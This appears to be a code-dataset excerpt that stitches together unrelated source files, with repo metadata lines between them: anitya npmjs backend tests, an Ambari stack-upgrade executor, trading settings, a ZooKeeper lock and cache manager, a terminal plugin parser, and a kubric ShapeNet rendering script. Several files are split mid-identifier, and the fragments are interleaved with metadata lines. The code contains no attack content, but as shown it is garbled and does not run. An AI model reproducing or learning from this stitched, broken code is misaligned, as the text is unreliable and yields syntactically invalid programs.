# of the GNU General Public License v.2, or (at your option) any later
# version. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details. You
# should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Any Red Hat trademarks that are incorporated in the source
# code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission
# of Red Hat, Inc.
#
"""
anitya tests for the npmjs backend.
"""
import unittest
import mock
import anitya.lib.backends.npmjs as backend
from anitya.db import models
from anitya.lib.exceptions import AnityaPluginException
from anitya.tests.base import DatabaseTestCase, create_distro
BACKEND = "npmjs"
class NpmjsBackendtests(DatabaseTestCase):
"""Drupal backend tests."""
def setUp(self):
"""Set up the environnment, ran before every tests."""
super(NpmjsBackendtests, self).setUp()
create_distro(self.session)
self.create_project()
def create_project(self):
"""Create some basic projects to work with."""
project = models.Project(
name="request",
homepage="https://www.npmjs.org/package/request",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
project = models.Project(
name="non-existent-package-that-does-not-exist",
homepage="https://www.npmjs.org/package/non-existent-package-that-does-not-exist",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
project = models.Project(
name="colors",
homepage="https://www.npmjs.org/package/colors",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
def test_get_version(self):
"""Test the get_version function of the npmjs backend."""
pid = 1
project = models.Project.get(self.session, pid)
exp = "2.83.0"
obs = backend.NpmjsBackend.get_version(project)
self.assertEqual(obs, exp)
pid = 2
project = models.Project.get(self.session, pid)
self.assertRaises(
AnityaPluginException, backend.NpmjsBackend.get_version, project
)
pid = 3
project = models.Project.get(self.session, pid)
exp = "1.2.0"
obs = backend.NpmjsBackend.get_version(project)
self.assertEqual(obs, exp)
def test_get_version_url(self):
"""
Assert that correct url is returned.
"""
project = models.Project(
name="test", homepage="https://example.org", backend=BACKEND
)
exp = "https://registry.npmjs.org/test"
obs = backend.NpmjsBackend.get_version_url(project)
self.assertEqual(obs, exp)
def test_get_version_not_modified(self):
"""Assert that not modified response is handled correctly"""
pid = 1
project = models.Project.get(self.session, pid)
exp_url = "https://registry.npmjs.org/request"
with mock.patch("anitya.lib.backends.BaseBackend.call_url") as m_call:
m_call.return_value = mock.Mock(status_code=304)
versions = backend.NpmjsBackend.get_version(project)
m_call.assert_called_with(exp_url, last_change=None)
self.assertEqual(versions, None)
def test_get_versions(self):
"""Test the get_versions function of the npmjs backend."""
pid = 1
project = models.Project.get(self.session, pid)
exp = [
"0.8.3",
"0.9.0",
"0.9.1",
"0.9.5",
"0.10.0",
"1.0.0",
"1.1.0",
"1.1.1",
"1.2.0",
"1.9.0",
"1.9.1",
"1.9.2",
"1.9.3",
"1.9.5",
"1.9.7",
"1.9.8",
"1.9.9",
"2.0.0",
"2.0.1",
"2.0.2",
"2.0.3",
"2.0.4",
"2.0.5",
"2.1.0",
"2.1.1",
"2.2.0",
"2.2.5",
"2.2.6",
"2.2.9",
"2.9.0",
"2.9.1",
"2.9.2",
"2.9.3",
"2.9.100",
"2.9.150",
"2.9.151",
"2.9.152",
"2.9.153",
"2.9.200",
"2.9.201",
"2.9.202",
"2.9.203",
"2.10.0",
"2.11.0",
"2.11.1",
"2.11.2",
"2.11.3",
"2.11.4",
"2.12.0",
"2.14.0",
"2.16.0",
"2.16.2",
"2.16.4",
"2.16.6",
"2.18.0",
"2.19.0",
"2.20.0",
"2.21.0",
"2.22.0",
"2.23.0",
"2.24.0",
"2.25.0",
"2.26.0",
"2.27.0",
"2.28.0",
"2.29.0",
"2.30.0",
"2.31.0",
"2.32.0",
"2.33.0",
"2.34.0",
"2.35.0",
"2.36.0",
"2.37.0",
"2.38.0",
"2.39.0",
"2.40.0",
"2.41.0",
"2.42.0",
"2.43.0",
"2.44.0",
"2.45.0",
"2.46.0",
"2.47.0",
"2.48.0",
"2.49.0",
"2.50.0",
"2.51.0",
"2.52.0",
"2.53.0",
"2.54.0",
"2.55.0",
"2.56.0",
"2.57.0",
"2.58.0",
"2.59.0",
"2.60.0",
"2.61.0",
"2.62.0",
"2.63.0",
"2.64.0",
"2.65.0",
"2.66.0",
"2.67.0",
"2.68.0",
"2.69.0",
"2.70.0",
"2.71.0",
"2.72.0",
"2.73.0",
"2.74.0",
"2.75.0",
"2.76.0",
"2.77.0",
"2.78.0",
"2.79.0",
"2.80.0",
"2.81.0",
"2.82.0",
"2.83.0",
]
obs = backend.NpmjsBackend.get_ordered_versions(project)
self.assertEqual(obs, exp)
pid = 2
project = models.Project.get(self.session, pid)
self.assertRaises(
AnityaPluginException, backend.NpmjsBackend.get_versions, project
)
pid = 3
project = models.Project.get(self.session, pid)
exp = [
"0.3.0",
"0.5.0",
"0.5.1",
"0.6.0",
"0.6.0-1",
"0.6.1",
"0.6.2",
"1.0.0",
"1.0.1",
"1.0.2",
"1.0.3",
"1.1.0",
"1.1.1",
"1.1.2",
"1.2.0-rc0",
"1.2.0",
]
obs = backend.NpmjsBackend.get_ordered_versions(project)
self.assertEqual(obs, exp)
def test_get_versions_not_modified(self):
"""Assert that not modified response is handled correctly"""
pid = 1
project = models.Project.get(self.session, pid)
exp_url = "https://registry.npmjs.org/request"
with mock.patch("anitya.lib.backends.BaseBackend.call_url") as m_call:
m_call.return_value = mock.Mock(status_code=304)
versions = backend.NpmjsBackend.get_versions(project)
m_call.assert_called_with(exp_url, last_change=None)
self.assertEqual(versions, [])
de
|
telefonicaid/fiware-cosmos-ambari
|
ambari-agent/src/main/python/ambari_agent/UpgradeExecutor.py
|
Python
|
apache-2.0
| 6,975
| 0.013333
|
#!/usr/bin/env python2.6
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import os.path
import logging
import pprint
import re
from Grep import Grep
from StackVersionsFileHandler import StackVersionsFileHandler
logger = logging.getLogger()
grep = Grep()
class UpgradeExecutor:
""" Class that performs the StackVersion stack upgrade"""
SCRIPT_DIRS = [
'pre-upgrade.d',
'upgrade.d',
'post-upgrade.d'
]
NAME_PARSING_FAILED_CODE = 999
def __init__(self, pythonExecutor, puppetExecutor, config):
self.pythonExecutor = pythonExecutor
self.puppetExecutor = puppetExecutor
self.stacksDir = config.get('stack', 'upgradeScriptsDir')
self.config = config
versionsFileDir = config.get('agent', 'prefix')
self.versionsHandler = StackVersionsFileHandler(versionsFileDir)
def perform_stack_upgrade(self, command, tmpout, tmperr):
logger.info("Performing stack upgrade")
params = command['commandParams']
srcStack = params['source_stack_version']
tgtStack = params['target_stack_version']
component = command['role']
srcStackTuple = self.split_stack_version(srcStack)
tgtStackTuple = self.split_stack_version(tgtStack)
if srcStackTuple is None or tgtStackTuple is None:
errorstr = "Source (%s) or target (%s) version does not match pattern \
<Name>-<Version>" % (srcStack, tgtStack)
logger.info(errorstr)
result = {
'exitcode' : 1,
'stdout' : 'None',
'stderr' : errorstr
}
elif srcStack != tgtStack:
paramTuple = sum((srcStackTuple, tgtStackTuple), ())
upgradeId = "%s-%s.%s_%s-%s.%s" % paramTuple
# Check stack version (do we need upgrade?)
basedir = os.path.join(self.stacksDir, upgradeId, component)
if not os.path.isdir(basedir):
errorstr = "Upgrade %s is not supported (dir %s does not exist)" \
% (upgradeId, basedir)
logger.error(errorstr)
result = {
'exitcode' : 1,
'stdout' : errorstr,
'stderr' : errorstr
}
else:
result = {
'exitcode' : 0,
'stdout' : '',
'stderr' : ''
}
# Request repos update (will be executed once before running any pp file)
self.puppetExecutor.discardInstalledRepos()
for dir in self.SCRIPT_DIRS:
if result['exitcode'] != 0:
break
tmpRes = self.execute_dir(command, basedir, dir, tmpout, tmperr)
result = {
'exitcode' : result['exitcode'] or tmpRes['exitcode'],
'stdout' : "%s\n%s" % (result['stdout'], tmpRes['stdout']),
'stderr' : "%s\n%s" % (result['stderr'], tmpRes['stderr']),
}
if result['exitcode'] == 0:
logger.info("Upgrade %s successfully finished" % upgradeId)
self.versionsHandler.write_stack_version(component, tgtStack)
else:
infostr = "target_stack_version (%s) matches current stack version" \
" for component %s, nothing to do" % (tgtStack, component)
logger.info(infostr)
result = {
'exitcode' : 0,
'stdout' : infostr,
'stderr' : 'None'
}
result = {
'exitcode' : result['exitcode'],
'stdout' : grep.tail(result['stdout'], grep.OUTPUT_LAST_LINES),
'stderr' : grep.tail(result['stderr'], grep.OUTPUT_LAST_LINES)
}
return result
def get_key_func(self, name):
"""
Returns a number from filenames like 70-foobar.* or 999 for
non-matching filenames
"""
parts = name.split('-', 1)
if not parts or not parts[0].isdigit():
logger.warn("Can't parse script filename number %s" % name)
return self.NAME_PARSING_FAILED_CODE  # unknown elements are placed at the end of the list
return int(parts[0])
def split_stack_version(self, verstr):
verdict = json.loads(verstr)
stack_name = verdict["stackName"].strip()
matchObj = re.match( r'(\d+).(\d+)', verdict["stackVersion"].strip(), re.M|re.I)
if matchObj:
stack_major_ver = matchObj.group(1)
stack_minor_ver = matchObj.group(2)
return stack_name, stack
|
_major_ver, stack_minor_ver
else:
return None
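# Hedged example of the parse above (input shape inferred from the code):
#   split_stack_version('{"stackName": "HDP", "stackVersion": "1.3.0"}')
#   returns ('HDP', '1', '3'); a non-matching version string returns None.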
def execute_dir(self, command, basedir, dir, tmpout, tmperr):
"""
Executes *.py and *.pp files locat
|
ed in a given directory.
Files are executed in numeric sorting order.
"""
dirpath = os.path.join(basedir, dir)
logger.info("Executing %s" % dirpath)
if not os.path.isdir(dirpath):
warnstr = "Script directory %s does not exist, skipping" % dirpath
logger.warn(warnstr)
result = {
'exitcode' : 0,
'stdout' : warnstr,
'stderr' : 'None'
}
return result
fileList=os.listdir(dirpath)
fileList.sort(key = self.get_key_func)
formattedResult = {
'exitcode' : 0,
'stdout' : '',
'stderr' : ''
}
for filename in fileList:
prevcode = formattedResult['exitcode']
if prevcode != 0 or self.get_key_func(filename) == self.NAME_PARSING_FAILED_CODE:
break
filepath = os.path.join(dirpath, filename)
if filename.endswith(".pp"):
logger.info("Running puppet file %s" % filepath)
result = self.puppetExecutor.run_manifest(command, filepath,
tmpout, tmperr)
elif filename.endswith(".py"):
logger.info("Running python file %s" % filepath)
result = self.pythonExecutor.run_file(command, filepath, tmpout, tmperr)
elif filename.endswith(".pyc"):
pass # skipping compiled files
else:
warnstr = "Unrecognized file type, skipping: %s" % filepath
logger.warn(warnstr)
result = {
'exitcode' : 0,
'stdout' : warnstr,
'stderr' : 'None'
}
formattedResult = {
'exitcode' : prevcode or result['exitcode'],
'stdout' : "%s\n%s" % (formattedResult['stdout'], result['stdout']),
'stderr' : "%s\n%s" % (formattedResult['stderr'], result['stderr']),
}
logger.debug("Result of %s: \n %s" % (dirpath, pprint.pformat(formattedResult)))
return formattedResult
|
bukosabino/btctrading
|
settings.py
|
Python
|
mit
| 422
| 0.004739
|
from datetime import date
NTESTS = 1
PREV_DAYS = 10
PERCENT_UP = 0.01
PERCEN
|
T_DOWN = 0.01
PERIOD = 'Hourly' # [5-min, 15-min, 30-min, Hourly, 2-hour, 6-hour, 12-hour, Daily, Weekly]
MARKET = 'bitstampUSD'
# DATE START
YEAR_START = 2011
MONTH_START = 9
DAY_START = 13
DATE_START = date(YEAR_START, MONTH_START, DAY_START)
# DATE END
DATE_END = date
|
.today()
URL_DATA_BASE = 'http://bitcoincharts.com/charts/chart.json?'
|
yandex/mastermind
|
src/cocaine-app/sync/kazoo_impl/__init__.py
|
Python
|
gpl-2.0
| 8,087
| 0.002844
|
from contextlib import contextmanager
import logging
import os.path
import traceback
from kazoo.client import KazooClient
from kazoo.exceptions import (
LockTimeout,
NodeExistsError,
NoNodeError,
KazooException,
ZookeeperError,
)
from kazoo.retry import KazooRetry, RetryFailedError
from mastermind.utils.queue import LockingQueue
from mastermind_core import helpers
import msgpack
# from errors import ConnectionError, InvalidDataError
from lock import Lock
from sync.error import LockError, LockFailedError, LockAlreadyAcquiredError, InconsistentLockError
logger = logging.getLogger('mm')
kazoo_logger = logging.getLogger('kazoo')
kazoo_logger.propagate = False
for h in logger.handlers:
    kazoo_logger.addHandler(h)
kazoo_logger.setLevel(logging.INFO)
class ZkSyncManager(object):
RETRIES = 2
LOCK_TIMEOUT = 3
def __init__(self, host='127.0.0.1:2181', lock_path_prefix='/mastermind/locks/'):
self.client = KazooClient(host, timeout=3)
logger.info('Connecting to zookeeper host {}, lock_path_prefix: {}'.format(
host, lock_path_prefix))
try:
self.client.start()
except Exception as e:
logger.error(e)
raise
self._retry = KazooRetry(max_tries=self.RETRIES)
self.lock_path_prefix = helpers.encode(lock_path_prefix)
@contextmanager
def lock(self, lockid, blocking=True, timeout=LOCK_TIMEOUT):
lock = Lock(self.client, self.lock_path_prefix + lockid)
try:
acquired = lock.acquire(blocking=blocking, timeout=timeout)
logger.debug('Lock {0} acquired: {1}'.format(lockid, acquired))
if not acquired:
# TODO: Change exception type or set all required parameters for
# this type of exception
raise LockAlreadyAcquiredError(lock_id=lockid)
yield
except LockTimeout:
logger.info('Failed to acquire lock {} due to timeout ({} seconds)'.format(
lockid, timeout))
raise LockFailedError(lock_id=lockid)
except LockAlreadyAcquiredError:
raise
except LockError as e:
logger.error('Failed to acquire lock {0}: {1}\n{2}'.format(
lockid, e, traceback.format_exc()))
raise
finally:
lock.release()
def persistent_locks_acquire(self, locks, data=''):
try:
retry = self._retry.copy()
result = retry(self._inner_persistent_locks_acquire, locks=locks, data=data)
except RetryFailedError:
raise LockError('Failed to acquire persistent locks {} after several retries'.format(
locks))
except KazooException as e:
logger.error('Failed to fetch persistent locks {0}: {1}\n{2}'.format(
locks, e, traceback.format_exc()))
raise LockError
return result
def _inner_persistent_locks_acquire(self, locks, data):
ensured_paths = set()
tr = self.client.transaction()
for lockid in locks:
path = self.lock_path_prefix + lockid
parts = path.rsplit('/', 1)
if len(parts) == 2 and parts[0] not in ensured_paths:
self.client.ensure_path(parts[0])
ensured_paths.add(parts[0])
tr.create(path, data)
failed = False
fail
|
ed_locks = []
result = tr.commit()
for i, res in
|
enumerate(result):
if isinstance(res, ZookeeperError):
failed = True
if isinstance(res, NodeExistsError):
failed_locks.append(locks[i])
if failed_locks:
holders = []
for f in failed_locks:
# TODO: fetch all holders with 1 transaction request
holders.append((f, self.client.get(self.lock_path_prefix + f)))
foreign_holders = [(l, h) for l, h in holders if h[0] != data]
failed_lock, holder_resp = foreign_holders and foreign_holders[0] or holders[0]
holder = holder_resp[0]
holders_ids = list(set(h[0] for _, h in holders))
logger.warn('Persistent lock {0} is already set by {1}'.format(failed_lock, holder))
raise LockAlreadyAcquiredError(
'Lock for {0} is already acquired by job {1}'.format(failed_lock, holder),
lock_id=failed_lock, holder_id=holder,
lock_ids=failed_locks, holders_ids=holders_ids)
elif failed:
logger.error('Failed to set persistent locks {0}, result: {1}'.format(
locks, result))
raise LockError
return True
def get_children_locks(self, lock_prefix):
try:
retry = self._retry.copy()
result = retry(self.__inner_get_children_locks, lock_prefix)
except RetryFailedError:
raise LockError('Failed to fetch children locks for {}'.format(
lock_prefix))
return result
def __inner_get_children_locks(self, lock_prefix):
full_path = self.lock_path_prefix + lock_prefix
self.client.ensure_path(os.path.normpath(full_path))
result = self.client.get_children(full_path)
return ['{0}{1}'.format(lock_prefix, lock) for lock in result]
def persistent_locks_release(self, locks, check=''):
try:
retry = self._retry.copy()
result = retry(self.__inner_persistent_locks_release, locks=locks, check=check)
except RetryFailedError:
raise LockError(
'Failed to release persistent locks {} after several retries'.format(locks)
)
except KazooException as e:
logger.error('Failed to remove persistent locks {0}: {1}\n{2}'.format(
locks, e, traceback.format_exc()))
raise LockError
return result
def __inner_persistent_locks_release(self, locks, check):
for lockid in locks:
try:
if check:
data = self.client.get(self.lock_path_prefix + lockid)
if data[0] != check:
logger.error(
'Lock {lock_id} has inconsistent data: {current_data}, '
'expected {expected_data}'.format(
lock_id=lockid,
current_data=data[0],
expected_data=check,
)
)
raise InconsistentLockError(lock_id=lockid, holder_id=data[0])
self.client.delete(self.lock_path_prefix + lockid)
except NoNodeError:
logger.warn('Persistent lock {0} is already removed'.format(lockid))
pass
return True
class ZkCacheTaskManager(object):
RETRIES = 2
def __init__(self, host='127.0.0.1:2181', lock_path_prefix='/mastermind/cache/'):
self.client = KazooClient(host, timeout=3)
logger.info('Connecting to zookeeper host {}, lock_path_prefix: {}'.format(
host, lock_path_prefix))
try:
self.client.start()
except Exception as e:
logger.error(e)
raise
self.lock_path_prefix = helpers.encode(lock_path_prefix)
def put_task(self, task):
group_id = task['group']
q = LockingQueue(self.client, self.lock_path_prefix, group_id)
return q.put(self._serialize(task))
def put_all(self, tasks):
for task in tasks:
self.put_task(task)
def list(self):
for group_id in self.client.retry(self.client.get_children, self.lock_path_prefix):
for item in LockingQueue(self.client, self.lock_path_prefix, group_id).list():
yield self._unserialize(item)
@staticmethod
def _serialize(task):
return msgpack.packb(task)
@staticmethod
def _unserialize(task):
return msgpack.unpackb(task)
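
# A minimal usage sketch, not part of the original module: it assumes a
# zookeeper instance is reachable at 127.0.0.1:2181 and that each task
# dict carries the 'group' key that put_task() reads. Payloads are
# msgpack-serialized, so values must be msgpack-compatible.
if __name__ == '__main__':
    manager = ZkCacheTaskManager(host='127.0.0.1:2181')
    manager.put_all([
        {'group': '1', 'action': 'add', 'key': 'sample-key'},
        {'group': '2', 'action': 'remove', 'key': 'other-key'},
    ])
    for task in manager.list():
        print(task)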
|
Bakterija/mmplayer
|
mmplayer/kivy_soil/terminal_widget/plugins/_base.py
|
Python
|
mit
| 4,885
| 0
|
class PluginBase(object):
name = ''
doc = 'doc about this class'
methods_subclass = {}
def __init__(self, **kwargs):
self.methods = {
'help': 'doc about help method',
'get_methods': 'doc about get_methods method'
}
self.methods.update(self.methods_subclass)
def on_import(self, term_system):
pass
def get_methods(self):
return [key for key in self.methods]
def help(self, method_name):
doc = self.methods.get(method_name[0], None)
if doc:
ret = doc
else:
ret = '# %s: %s: %s not found' % (
self.name, 'help', method_name)
return ret
@staticmethod
def get_args_kwargs_from_text(text):
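        # Split raw argument text into positional args and key=value
        # kwargs, keeping quoted substrings (single or double quotes)
        # together as single tokens.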
start_str = (None, -1)
strings_found = []
kwargs_found = {}
args_found = []
for i, char in enumerate(text):
if char in ("'", '"'):
if start_str[0]:
if char == start_str[0]:
rev = text[:i+1][::-1]
b = rev[i+1 - start_str[1]:].find(' ')
if b != -1:
strings_found.append((start_str[1] - b, i+1))
else:
strings_found.append((start_str[1], i+1))
start_str = (None, -1)
else:
start_str = (char, i)
if strings_found:
last_end = 0
for start, end in strings_found:
before = text[last_end:start]
for x in before.split(' '):
if x:
args_found.append(x)
args_found.append(text[start:end])
last_end = end
for x in text[end:].split(' '):
if x:
args_found.append(x)
else:
args_found = text.split(' ')
remlist = []
for i, x in enumerate(args_found):
a = x.find('=')
if a != -1:
yes = False
c = x.find("'")
b = x.find('"')
if b == -1 and c == -1:
yes = True
else:
start = b
if c != -1 and c < b:
start = c
a = x[:start].find('=')
                    if a != -1:
yes = True
if yes:
kwargs_found[x[:a]] = x[a+1:]
remlist.append(i)
for x in reversed(remlist):
del args_found[x]
return args_found, kwargs_found
@staticmethod
def get_from_locals_globals(term_system, text):
ret = term_system.exec_locals.get(text, None)
if not ret:
ret = term_system.get_globals().get(text, None)
return ret
@staticmethod
def slice_fname(text):
fname = ''
text2 = ''
if text:
b = text.find(' ')
if b != -1:
text2 = text[b+1:]
fname = text[:b]
else:
fname = text
return fname, text2
@staticmethod
def get_method_args(text):
fname = ''
method = ''
args = []
if text:
aspl = text.split(' ')
fname = aspl[0]
if len(aspl) > 1:
method = aspl[1]
if len(aspl) > 2:
args = aspl[2:]
return fname, method, tuple(args)
@staticmethod
def get_method_args_kwargs(text):
fname, method, args, kwargs = '', '', [], {}
if text:
aspl = text.split(' ')
fname = aspl[0]
if len(aspl) > 1:
method = aspl[1]
if len(aspl) > 2:
args, kwargs = PluginBase.get_args_kwargs_from_text(
' '.join(aspl[2:]))
return fname, method, tuple(args), kwargs
def handle_input(self, term_system, term_globals, exec_locals, text):
fname, method, args, kwargs = self.get_method_args_kwargs(text)
found = False
if method in self.methods:
m = getattr(self, method, None)
if m:
found = True
if args and kwargs:
result = m(*args, **kwargs)
elif args:
result = m(*args)
elif kwargs:
result = m(**kwargs)
else:
result = m()
if not found:
result = (
'# %s: Method "%s" not found\n'
'# Available methods are %s\n'
'# Type "help [method_name]" for help') % (
self.name, method, self.get_methods())
return result
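
# A small illustrative sketch, not part of the original module, showing
# how the static parsing helpers split terminal input; the plugin name,
# method and arguments below are made up for the example.
if __name__ == '__main__':
    line = 'player seek 42 speed=1.5 title="some song"'
    fname, method, args, kwargs = PluginBase.get_method_args_kwargs(line)
    print(fname)   # player
    print(method)  # seek
    print(args)    # ('42',)
    print(kwargs)  # {'speed': '1.5', 'title': '"some song"'}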
|
google-research/kubric
|
examples/shapenet.py
|
Python
|
apache-2.0
| 3,800
| 0.002368
|
# Copyright 2022 The Kubric Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import numpy as np
import kubric as kb
from kubric.renderer import Blender
# TODO: go to https://shapenet.org/ create an account and agree to the terms
# then find the URL for the kubric preprocessed ShapeNet and put it here:
SHAPENET_PATH = "gs://KUBRIC_SHAPENET_PATH/ShapeNetCore.v2.json"
if SHAPENET_PATH == "gs://KUBRIC_SHAPENET_PATH/ShapeNetCore.v2.json":
raise ValueError("Wrong ShapeNet path. Please visit https://shapenet.org/ "
"agree to terms and conditions, and find the
|
correct path.")
# --- CLI arguments
parser = kb.ArgumentParser()
parser.set_defaults(
frame_end=5,
resolution=(512, 512),
)
FLAGS = parser.parse_args()
# --- Common setups & resources
scene, rng, output_dir, scratch_dir = kb.setup(FLAGS)
renderer = Blender(scene, scratch_dir,
samples_per_pixel=64,
background_transparency=True)
shapenet = kb.AssetSource.from_manifest(SHAPENET_PATH)
# --- Add Klevr-like lights to the scene
scene += kb.assets.utils.get_clevr_lights(rng=rng)
scene.ambient_illumination = kb.Color(0.05, 0.05, 0.05)
# --- Add shadow-catcher floor
floor = kb.Cube(name="floor", scale=(100, 100, 1), position=(0, 0, -1))
scene += floor
# Make the floor transparent except for catching shadows
# Together with background_transparency=True (above) this results in
# the background being transparent except for the object shadows.
floor.linked_objects[renderer].cycles.is_shadow_catcher = True
# --- Keyframe the camera
scene.camera = kb.PerspectiveCamera()
for frame in range(FLAGS.frame_start, FLAGS.frame_end + 1):
scene.camera.position = kb.sample_point_in_half_sphere_shell(1.5, 1.7, 0.1)
scene.camera.look_at((0, 0, 0))
scene.camera.keyframe_insert("position", frame)
scene.camera.keyframe_insert("quaternion", frame)
# --- Fetch a random (airplane) asset
airplane_ids = [name for name, spec in shapenet._assets.items()
if spec["metadata"]["category"] == "airplane"]
asset_id = rng.choice(airplane_ids) #< e.g. 02691156_10155655850468db78d106ce0a280f87
obj = shapenet.create(asset_id=asset_id)
logging.info(f"selected '{asset_id}'")
# --- make object flat on X/Y and not penetrate floor
obj.quaternion = kb.Quaternion(axis=[1, 0, 0], degrees=90)
obj.position = obj.position - (0, 0, obj.aabbox[0][2])
scene.add(obj)
# --- Rendering
logging.info("Rendering the scene ...")
renderer.save_state(output_dir / "scene.blend")
data_stack = renderer.render()
# --- Postprocessing
kb.compute_visibility(data_stack["segmentation"], scene.assets)
data_stack["segmentation"] = kb.adjust_segmentation_idxs(
data_stack["segmentation"],
scene.assets,
[obj]).astype(np.uint8)
kb.file_io.write_rgba_batch(data_stack["rgba"], output_dir)
kb.file_io.write_depth_batch(data_stack["depth"], output_dir)
kb.file_io.write_segmentation_batch(data_stack["segmentation"], output_dir)
# --- Collect metadata
logging.info("Collecting and storing metadata for each object.")
data = {
"metadata": kb.get_scene_metadata(scene),
"camera": kb.get_camera_info(scene.camera),
"object": kb.get_instance_info(scene, [obj])
}
kb.file_io.write_json(filename=output_dir / "metadata.json", data=data)
kb.done()
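
# Illustrative invocation, based on the kubric README (image tag and
# flags are assumptions, not part of this script):
#   docker run --rm --interactive --volume "$(pwd):/kubric" \
#       kubricdockerhub/kubruntu python3 examples/shapenet.py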
|